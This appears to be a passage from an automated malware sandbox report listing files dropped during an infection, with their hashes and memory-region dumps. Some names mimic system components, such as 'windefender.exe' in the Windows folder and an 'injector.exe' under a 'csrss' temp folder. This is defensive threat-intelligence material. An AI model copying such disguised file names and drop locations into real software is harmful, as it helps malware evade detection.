| MD5 | d30b64e41471005564cacc24685d4eb8 |
| SHA1 | 58a5160710b57ced78891da46398b5f1937c3e50 |
| SHA256 | cb4d28a2f2411c5190d42ee1f5a96e407d271f7ee52f7bd8cd8fd7ff8185f7d6 |
| SHA512 | 130073e0c5218d8e406d9cb0eaba41eb351409f762e342cfc3cb92368f2d12931420c1d52074e26c757dee544e30abb28e711e8b16af446b41825c79147d3bc5 |
C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe
| MD5 | 975529a4ae6157af49622a32a305264d |
| SHA1 | f510edf122ed1395aeb0b1a87614de7f5db5b10a |
| SHA256 | 98f202554f40c2873f149280b6f7e392f4a6a512b6335d2ada4d1ad710498d24 |
| SHA512 | 3fbea71c6c1b19b7c388fdedd3d9c4957dd3fe415a745f8adc8c06bf99df52fc0706961b469c9f3235246b6f2e4565feeb7142966da94b15db58f916790201ab |
memory/524-1246-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe
| MD5 | 98a614c32f63103813a9f9ed610f3971 |
| SHA1 | e8f90f2f2fa4c72a5b7b65025570ceb6f604b03b |
| SHA256 | fb396e9aa9116781904621cad9ecc9793018d2120d9aa9c4f958c40b2bf62c5b |
| SHA512 | 32b1373169fe030a73aadcc110c779559dbf8ce6699155b975ce967cf2dc03207f01fce4c92955ef670d5251c6d792c5343cf4db9daa471914080c8aea0f1ffc |
C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe
| MD5 | d67e7a7d5f9bba90b21f1066d3a87392 |
| SHA1 | bf37b605f2decd76265f06a3fb5d0af9c10c0e47 |
| SHA256 | 34387487f67c14b0d7b1b729945b9ad09fb7c12d4ec71645badb6a21cece1381 |
| SHA512 | b8f33d7bd92add0cb3280fc2cfbb2c44ba36f2957a6a7b825dbf7fbc924cdd25bf4301c51e97065adadbe86019884bbfbfa1cf5c08c3773a27d3304d83ce509e |
memory/4424-1250-0x0000000000400000-0x0000000002957000-memory.dmp
memory/4228-1252-0x0000000000400000-0x0000000002957000-memory.dmp
memory/1748-1248-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe
| MD5 | 79f59301af845feb7f0353e719730f88 |
| SHA1 | 0946292e91f92aed847553f6a47f9e54a245185c |
| SHA256 | f3c346af7df0f9f3fa14ae26048d62cee389b5a5a181c944564579b594809147 |
| SHA512 | e9f6ad0080fa0ce57e5e10738b30ff2f7654361ef30c3ac88e95304f0671ba152c1f42b841dfec196875f3fa7fe4fa918eee711b50728399c3448b2733cee31f |
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | 155858895668173c15814be48c072a5c |
| SHA1 | 5f6ac85348f9f76fad4a08bbc56b21e387b7ab33 |
| SHA256 | 0432514be4fde5c81dc5fbbaca5a35a298bb02b0af034d4c3b65cff3309bf290 |
| SHA512 | 17605e4e7d7be227cb3508f4a082cd775f81739adfd5512d12ecca448bd3f5ae489d06e55843aa38437415ced66f02a50a2e4a9fb1f941d1016db3ec63604582 |
memory/5944-1281-0x0000000007FA0000-0x0000000007FEB000-memory.dmp
memory/5960-1276-0x0000000007CB0000-0x0000000008000000-memory.dmp
memory/5944-1316-0x000000006EEA0000-0x000000006EEEB000-memory.dmp
memory/5944-1322-0x00000000094B0000-0x0000000009555000-memory.dmp
memory/5944-1317-0x000000006DE90000-0x000000006E1E0000-memory.dmp
memory/508-1343-0x0000000000400000-0x0000000002574000-memory.dmp
memory/5960-1419-0x000000006DE90000-0x000000006E1E0000-memory.dmp
memory/5960-1418-0x000000006EEA0000-0x000000006EEEB000-memory.dmp
memory/6116-1632-0x000000006EEA0000-0x000000006EEEB000-memory.dmp
memory/6108-1635-0x000000006DE90000-0x000000006E1E0000-memory.dmp
memory/6116-1634-0x000000006DE90000-0x000000006E1E0000-memory.dmp
memory/6108-1633-0x000000006EEA0000-0x000000006EEEB000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 72ff89b6afc5312450c13b4a6263b4d8 |
| SHA1 | bf13409317ad3dd997f61b35da84af5c7f532781 |
| SHA256 | b88d03da8e82de6e24bde465eb064515c3165dde94d4cadc9f6036917c08a36b |
| SHA512 | 673a389b24190e3115fc4539e12ca216a417a59cba78e38b6fefebf8709b468c7c2fc8415429d240a8c03773e65408c7406da57e634e13c87f384929d103b557 |
memory/5236-2255-0x000000006DE90000-0x000000006E1E0000-memory.dmp
memory/5236-2254-0x000000006EEA0000-0x000000006EEEB000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 1fb2375f911a32f1e2bdc531d290e046 |
| SHA1 | 43d8c36a0dc1e264f80b3b81e31e18a42e96e73a |
| SHA256 | 05037b19f1fc8f7680f48a0fd6977db25c0e6dae7629285eeee53214e4ac8d42 |
| SHA512 | eac1cfc4f196fa2d9e36bc8cd98622e5e1d64759027591d42c2ef9f49bd5702500c1e6baf597f2ed746ce767fecc2945f3eb98b9cda83e2cac49b6755072c513 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 955e3e422a5fd7250a3775e1d27c1d0f |
| SHA1 | cd59b87ff60025de0630afd702c3073671e69ab6 |
| SHA256 | c421cb486ae81e009d14820c1669ed00e57dc741c8722eefce538bbc3ee3fe2a |
| SHA512 | 690ca4f944e91a62df065c08c7b03f6bba29d8d41bd98bdbaf70ef3d928112ace6866aaf276c213244b25f857c55b9cf28652657c94c61dc806b6cbbb6be6e55 |
memory/5852-2350-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/4060-2466-0x000000006DE90000-0x000000006E1E0000-memory.dmp
memory/4060-2465-0x000000006EEA0000-0x000000006EEEB000-memory.dmp
memory/5168-2515-0x000000006EEA0000-0x000000006EEEB000-memory.dmp
memory/5168-2518-0x000000006DE90000-0x000000006E1E0000-memory.dmp
memory/4708-2783-0x000000006EEA0000-0x000000006EEEB000-memory.dmp
memory/4708-2804-0x000000006DE90000-0x000000006E1E0000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 750674b6fd1a5d1cce13cbe9a79cb4aa |
| SHA1 | 197ac6c2545caf02333d809f5a1a2336e718050b |
| SHA256 | 11b13596860067158addd8dedf6057990d72aed00de83499c6741282d4ee9037 |
| SHA512 | f0039319231185d170596f8c4261a59bcbe88efa4a8a518812fbc4691f1b1d31bf2a8a1d010d8b8859cf9da700ac15051f59e2677f6702a36f2b3ef3c02dc9ce |
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | 1267857f0994b1877c41bc66a6cfe1b3 |
| SHA1 | 5386994c7b30162fa690ffc60df38ef8f31fac59 |
| SHA256 | 6395030553d2217ec6a5c03656fe8277a76880c48398fd4aaa190747f8ef793c |
| SHA512 | f4cafa6bbc1121727e98c6867575f2a0e65143176b1f1c0013e2171b809717d869ac43b1eac73e1b082a9f0e6453f964a4fcd499b54e253dfb0fbd273faff984 |
memory/4148-3197-0x000000006DE90000-0x000000006E1E0000-memory.dmp
memory/4148-3196-0x000000006EEA0000-0x000000006EEEB000-memory.dmp
memory/4528-3434-0x000000006DE90000-0x000000006E1E0000-memory.dmp
memory/4528-3433-0x000000006EEA0000-0x000000006EEEB000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | b5d8cd6ab952c3505196d44e93e330d7 |
| SHA1 | cf09b0fdc616a65f4070d73fe6494cc9dfd972c9 |
| SHA256 | a57aa91f1fe4448835be357842e6e0555a8c3143f2cd239a600c98bc28bf4058 |
| SHA512 | 342cf873976a83ac48d6eb869d6887c8e2fc40a5429c3137951ef5a7d3c8b7931a15176b439265ba36ab72e150515b6a38e076c77d32eb50a5c6b916c646bb61 |
memory/5852-3455-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/4604-3523-0x0000023E4FFC0000-0x0000023E537F4000-memory.dmp
memory/4604-3592-0x0000023E6DD00000-0x0000023E6DD0C000-memory.dmp
memory/4604-3648-0x0000023E6DD30000-0x0000023E6DD54000-memory.dmp
memory/4604-3647-0x0000023E6DC90000-0x0000023E6DCA4000-memory.dmp
memory/4604-3591-0x0000023E53BC0000-0x0000023E53BD0000-memory.dmp
memory/4604-3590-0x0000023E6F5C0000-0x0000023E6F6CA000-memory.dmp
memory/5592-3691-0x0000000000400000-0x0000000002957000-memory.dmp
memory/5676-3702-0x0000000000400000-0x0000000002957000-memory.dmp
memory/5592-3709-0x0000000000400000-0x0000000002957000-memory.dmp
memory/5632-3701-0x0000000000400000-0x0000000002957000-memory.dmp
memory/4764-3717-0x000000006DE90000-0x000000006E1E0000-memory.dmp
memory/4764-3716-0x000000006EEA0000-0x000000006EEEB000-memory.dmp
memory/5604-3692-0x0000000000400000-0x0000000002957000-memory.dmp
memory/5388-3729-0x000000006DE90000-0x000000006E1E0000-memory.dmp
memory/5388-3726-0x000000006EEA0000-0x000000006EEEB000-memory.dmp
memory/2272-3703-0x00007FFB3FAC3000-0x00007FFB3FAC4000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | a2b875853a499c113cb1b765cc193e3f |
| SHA1 | b7ad94bd96dd14fedcc5344767b438343e03a59d |
| SHA256 | dd3ed40b6159ed3322d7766b04c6822b07d6bf13990e94fa9df7cad209773f43 |
| SHA512 | ce1780375c1422401e644336ccd744e0a0e299df23c68ce670af32b8e0856165c154cc5346e21a62b1bdacca5a6f775d4159e3b3d2ac783dcdfa4623fc24b18a |
memory/5604-4152-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | bf3f4f736a91ad59bbe0e957ef7bfd6b |
| SHA1 | ae51812ab1d3f1313fac8335eed904e9f6f0cbcf |
| SHA256 | 76eba60573d689954cabddbe655eb208ab97184eedc6c6992ff71344bacb0ed9 |
| SHA512 | b47c3d96f5a52eebea8e76d2906a954ee01dad3227213fc55ec98d430dee0aedd782332799787adb9c6c22b0f4795f75365f185d40b63e45e5b03c1f0c41bf39 |
memory/5676-4185-0x0000000000400000-0x0000000002957000-memory.dmp
memory/4792-4191-0x000000006EEA0000-0x000000006EEEB000-memory.dmp
memory/4792-4197-0x0000000009DF0000-0x0000000009E95000-memory.dmp
memory/5632-4186-0x0000000000400000-0x0000000002957000-memory.dmp
memory/4792-4192-0x000000006DE90000-0x000000006E1E0000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 9e5d4838761dcf4c5f2ecc94711ac05d |
| SHA1 | 1aebd2a150d5608522d610c19f1473fcad4f4d46 |
| SHA256 | 4f0b4b78cea8c36ef4cf51478810dc46952e59098a7566435a8ae65b45c2117b |
| SHA512 | 1d28cdcc73359119a9ba4cd2a9624f7ea84e9d677fde57da910b8b703d0322422ebf9532aae534a43ea7b5c23662e8879338bea27e7edbd411cbe4c933a56710 |
memory/2272-4413-0x00007FFB3FAC0000-0x00007FFB404AC000-memory.dmp
memory/5616-4414-0x00000000077E0000-0x0000000007B30000-memory.dmp
memory/5616-4416-0x0000000008340000-0x000000000838B000-memory.dmp
memory/4604-4437-0x0000023E6DCE0000-0x0000023E6DCEA000-memory.dmp
memory/4604-4445-0x0000023E6FAB0000-0x0000023E6FB00000-memory.dmp
memory/4604-4444-0x0000023E6FA30000-0x0000023E6FA5A000-memory.dmp
memory/4604-4443-0x0000023E6F960000-0x0000023E6FA12000-memory.dmp
memory/5616-4442-0x0000000009390000-0x0000000009435000-memory.dmp
memory/4604-4518-0x0000023E6FB30000-0x0000023E6FE30000-memory.dmp
memory/4604-4514-0x0000023E6DCF0000-0x0000023E6DCFA000-memory.dmp
memory/5616-4436-0x000000006EFF0000-0x000000006F340000-memory.dmp
memory/5616-4435-0x000000006F430000-0x000000006F47B000-memory.dmp
memory/4604-4632-0x0000023E73C60000-0x0000023E73C68000-memory.dmp
memory/4604-4658-0x0000023E73CC0000-0x0000023E73CC8000-memory.dmp
memory/4604-4664-0x0000023E74E70000-0x0000023E74E92000-memory.dmp
memory/4604-4668-0x0000023E753C0000-0x0000023E758E6000-memory.dmp
memory/4604-4671-0x0000023E74E00000-0x0000023E74E0C000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 887ac41750ae13a63c0c1ab30203d5c7 |
| SHA1 | b3dd192c73b40b368bc817fb51ccb180b2823abc |
| SHA256 | 8013a868a8a87833990672c0582e2362d2a53b6969cd73da133570211ab67dfd |
| SHA512 | dccc3a4ee3a74eb69b17f04f62026d4ac4e17ebab70975ee4c7efbce95e9150dd20651c6fbd60cdc763084d1a1198919b6c17fa9705ab06349a3afa70202da03 |
memory/4604-4662-0x0000023E74E10000-0x0000023E74E72000-memory.dmp
memory/4604-4659-0x0000023E74DF0000-0x0000023E74DFA000-memory.dmp
memory/4604-4657-0x0000023E74AF0000-0x0000023E74B28000-memory.dmp
memory/2680-4691-0x000000006F430000-0x000000006F47B000-memory.dmp
memory/2680-4692-0x000000006EFF0000-0x000000006F340000-memory.dmp
memory/4556-4905-0x000000007378E000-0x000000007378F000-memory.dmp
memory/4604-4906-0x0000023E74EB0000-0x0000023E74ECE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/508-4913-0x0000000000400000-0x0000000002574000-memory.dmp
memory/3204-4914-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
memory/5056-4922-0x0000000000400000-0x00000000008DF000-memory.dmp
C:\Windows\windefender.exe
| MD5 | eac3c94e166a4ac3e7d3dbf26d505ebb |
| SHA1 | c231e723ad6077f9b6bd12c5e7bd3fd208f7fa45 |
| SHA256 | 662eb9030b85d481e53772eb13a1b747a62bc68a862e0e4ba90f4e6acb3fe124 |
| SHA512 | b5b0f2d3205ebf43593ae73318cc078b5eafed92be6c8d113cf0e7dbef9f84da759301393b9528ac7f11b2f82dd8a190ad5c2b9066c84afbc1c9fb775fcff1a0 |
memory/3204-4924-0x0000000000400000-0x0000000002957000-memory.dmp
memory/508-4927-0x0000000000400000-0x0000000002574000-memory.dmp
memory/3204-4928-0x0000000000400000-0x0000000002957000-memory.dmp
memory/3204-4931-0x0000000000400000-0x0000000002957000-memory.dmp
memory/5276-4932-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/508-4933-0x0000000000400000-0x0000000002574000-memory.dmp
memory/3204-4934-0x0000000000400000-0x0000000002957000-memory.dmp
memory/3204-4937-0x0000000000400000-0x0000000002957000-memory.dmp
memory/508-4939-0x0000000000400000-0x0000000002574000-memory.dmp
memory/3204-4940-0x0000000000400000-0x0000000002957000-memory.dmp
memory/5276-4941-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/3204-4943-0x0000000000400000-0x0000000002957000-memory.dmp
memory/3204-4946-0x0000000000400000-0x0000000002957000-memory.dmp
memory/3204-4949-0x0000000000400000-0x0000000002957000-memory.dmp
memory/3204-4952-0x0000000000400000-0x0000000002957000-memory.dmp
memory/3204-4955-0x0000000000400000-0x0000000002957000-memory.dmp
memory/3204-4958-0x0000000000400000-0x0000000002957000-memory.dmp
memory/3204-4961-0x0000000000400000-0x0000000002957000-memory.dmp
memory/3204-4964-0x0000000000400000-0x0000000002957000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 24b4d7db201bfd1631e0ccbed1627df8 |
| SHA1 | 707216ce680c880ee755c6cc72dc9c02c284a949 |
| SHA256 | 23e1f2e75be07a8026bf98f426c585a41af270212b5f88dc4462b4d6c116fb39 |
| SHA512 | f41830cda1d79d15dcee984923846c62ac65908fdaf664fc355eaeee7a9ec59ae176cf73b8f57c7150d081fca0f895c18df47e5547ea3dc6944b0259c3ec5c78 |
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
| MD5 | dcb505dc2b9d8aac05f4ca0727f5eadb |
| SHA1 | 4f633edb62de05f3d7c241c8bc19c1e0be7ced75 |
| SHA256 | 61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551 |
| SHA512 | 31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | edf05d3be7c5375eb1349c2d99f5a6b1 |
| SHA1 | 7ff1964936a6aa03459013d980f94ac38a424e40 |
| SHA256 | 4eb405e06c90d7ac967c32aa1068e447fcd67b83fd2526b7ea902bf4c64f99df |
| SHA512 | 44873704587c07f1f697affffe90a8758ef9075543aa7e4555f51cb2fb446f631c1357ac98c8e966c83c53c04e60f9266f131e068a13d3228305e57613039687 |
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
| MD5 | 713674d5e968cbe2102394be0b2bae6f |
| SHA1 | 90ac9bd8e61b2815feb3599494883526665cb81e |
| SHA256 | f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057 |
| SHA512 | e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 43fe051fe3c3ff13cb2ac93081dc160a |
| SHA1 | a0aa9aabed6d3fbd5eb45a30416642f94c2f7910 |
| SHA256 | 1f311efa0946f01d5031de7e718802a7e7db8725c463b85f1ee013f3ed2205ed |
| SHA512 | a8cb7a64925de0fc41a5a3e9d11e62a39c14b421ce2a01f55615cdef9000757277fb78d98dcfa0473c4d1d3c89042eac3d7e8e25a9b2ddb65f0db21625aaae17 |
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
| MD5 | 1bf850b4d9587c1017a75a47680584c4 |
| SHA1 | 75cd4738ffc07f203c3f3356bc946fdd0bcdbe19 |
| SHA256 | ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955 |
| SHA512 | ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08 |